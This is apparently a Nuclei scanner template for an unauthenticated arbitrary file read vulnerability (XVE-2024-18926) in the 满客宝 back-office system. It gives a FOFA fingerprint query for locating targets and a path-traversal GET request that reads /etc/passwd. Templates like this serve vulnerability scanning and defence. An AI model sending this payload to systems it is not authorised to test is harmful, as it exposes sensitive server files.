id: mankebao-downloadWebFile-File-reading

info:
  name: 满客宝后台管理系统 downloadWebFile 任意文件读取漏洞(XVE-2024-18926)
  author: Superhero
  severity: high
  description: |-
    fofa: body="满客宝后台管理系统"
    满客宝后台管理系统 downloadWebFile 接囗处存在任意文件读取漏洞,未经身份验证的远程攻击者通过漏洞可以获取到服务器敏感信息，导致系统处于极不安全的状态。
  reference:
    - https://blog.csdn.net/m0_60571842/article/details/140950697
  tags: File reading


http:
  - raw:
      - |
        GET /base/api/v1/kitchenVideo/downloadWebFile.swagger?fileName=&ossKey=/../../../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root:x'
          - '/bin/bash'
        condition: and
      - type: status
        status: 
          - 200